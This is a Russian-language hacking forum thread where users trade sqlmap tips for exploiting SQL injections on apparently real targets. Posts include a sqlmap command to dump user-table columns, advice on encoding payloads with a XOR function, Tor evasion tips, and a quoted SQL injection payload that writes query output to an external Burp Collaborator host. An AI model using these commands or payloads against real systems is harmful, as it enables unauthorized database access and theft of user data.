Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    303
    Likes Received:
    143
    Reputations:
    2
    --dump еще по идее надо
     
  2. sosidzh24

    sosidzh24 New Member

    Joined:
    10 Apr 2019
    Messages:
    55
    Likes Received:
    3
    Reputations:
    0
    на --batch он сам сдампит
     
  3. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    93
    Likes Received:
    69
    Reputations:
    3
    -D information_schema -T columns -C table_name,column_name --where="table_name LIKE '%_users'" --dump
    нееее, не так? =) dmjROV тестани, если тебе именно колумны с таблов где *_узерс повыводить ннада.
    Или я не понял с недосыпа, поздновато уже.
     
    #983 panic.ker, 26 Nov 2019
    Last edited: 26 Nov 2019
  4. norther

    norther New Member

    Joined:
    23 Mar 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Приветствую!

    Ковыряю одну скулю:
    SqlMap последней версии
    web application technology: Apache, Nginx
    back-end DBMS operating system: Linux Debian
    back-end DBMS: PostgreSQL

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause

    ПРОБЛЕМА: При получении ответа на любой запрос постоянно на случайных позициях неправильно определяет символы! Например, получаю имя колонки "user_id", так SqlMap может один раз выдать "use?_id", в другой раз если повторить запрос выдаст ""uQer_id" или "uMe#_id" и т.д. Иногда вообще неотображаемые символы получаются и SqlMap на то ругается:
    "cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files"
    " [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'"

    --no-cast и --hex пробовал - не помогает.
    Ответы сервера понятные и предсказуемые. Если подставляемое выражение = FALSE то возвращается пустая страница при TRUE возвращается с контентом

    Что это может быть? Какие возможные решения данной проблемы?
     
  5. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    181
    Likes Received:
    20
    Reputations:
    2
    Где в sqlmap настройки цветовой палитры?? Хочу изменить цвет текста
     
  6. madik

    madik Member

    Joined:
    4 May 2017
    Messages:
    235
    Likes Received:
    80
    Reputations:
    6
    Ребят такой вопрос известно где находится уязвимость, но не могу понять как мне payload пронать через xor, уязвимый скрипт принимает даные в хоре а потом уже у себя их распаковывает подскажите плиз

    def CB_XORm(data, key):
    j=0
    key = list(key)
    data = list(data)
    tmp = list()
    for i in range(len(data)):
    tmp.append(chr(ord(data)^ord(key[j])))
    j += 1
    if j > (len(key)-1):
    j = 0
    return "".join(tmp)
     
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    В настройках терминала
     
    ms13 likes this.
  8. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    162
    Likes Received:
    4
    Reputations:
    0
    _on=0%20into%20outfile%20'%5c%5c%5c%5cil795b45129ixd3s13rbi2jn1e77v9j0nofb9zy.burpcollaborator.net%5c%5caju'%3b%20--%20

    n parameter appears to be vulnerable to SQL injection attacks. The payload into outfile '\\\\il795b45129ixd3s13rbi2jn1e77v9j0nofb9zy.burpcollaborator.net\\aju'; -- was submitted in the on. This payload causes the database to write the results of the query to a file, and specifies a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.


    как крутануть такую скулю?мап не берет(
     
    #988 brown, 24 Dec 2019
    Last edited: 24 Dec 2019
  9. madik

    madik Member

    Joined:
    4 May 2017
    Messages:
    235
    Likes Received:
    80
    Reputations:
    6
    Я как понял ни кто мне не подскажет
     
  10. fandor9

    fandor9 Active Member

    Joined:
    16 Nov 2018
    Messages:
    218
    Likes Received:
    227
    Reputations:
    8
    Если вы знаете key, то прогоните ваш payload через эту же фукнцию и получите зашифрованный payload, который вы отправяете серверу.
     
  11. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,986
    Likes Received:
    871
    Reputations:
    198
    Через коллоборатор только ручками пока что. Ну или пишите софт сами, готовых реализаций пока что не видел.
     
    _________________________
  12. madik

    madik Member

    Joined:
    4 May 2017
    Messages:
    235
    Likes Received:
    80
    Reputations:
    6
    поподробнее можно?
     
  13. RedHazard

    RedHazard Member

    Joined:
    17 Apr 2011
    Messages:
    66
    Likes Received:
    12
    Reputations:
    8
    Народ напишите пожалуйста команды
    sql-shell , типа:
    - вывести все таблицы с базы
    простой синтаксис sql не хочет работать.
     
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    Что?
     
  15. RedHazard

    RedHazard Member

    Joined:
    17 Apr 2011
    Messages:
    66
    Likes Received:
    12
    Reputations:
    8
    upload_2020-1-28_1-31-32.png
     
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
  17. RedHazard

    RedHazard Member

    Joined:
    17 Apr 2011
    Messages:
    66
    Likes Received:
    12
    Reputations:
    8
    ты наверное не увидел моего вопроса ?

     
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    Если простой sql синиакс не работает, то тебе никто не поможет.
     
    fandor9 likes this.
  19. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    SHOW DATABASES
     
  20. yuriy_ivanov

    yuriy_ivanov New Member

    Joined:
    27 Sep 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    на слепую скорее всего прога выдала ложный вывод , добавь в строку --banner --fresh-queries .
    как вариант ,запустить через ТОР + верболзция=3 , смотреть на что ругается и символы корректировать
     
Loading...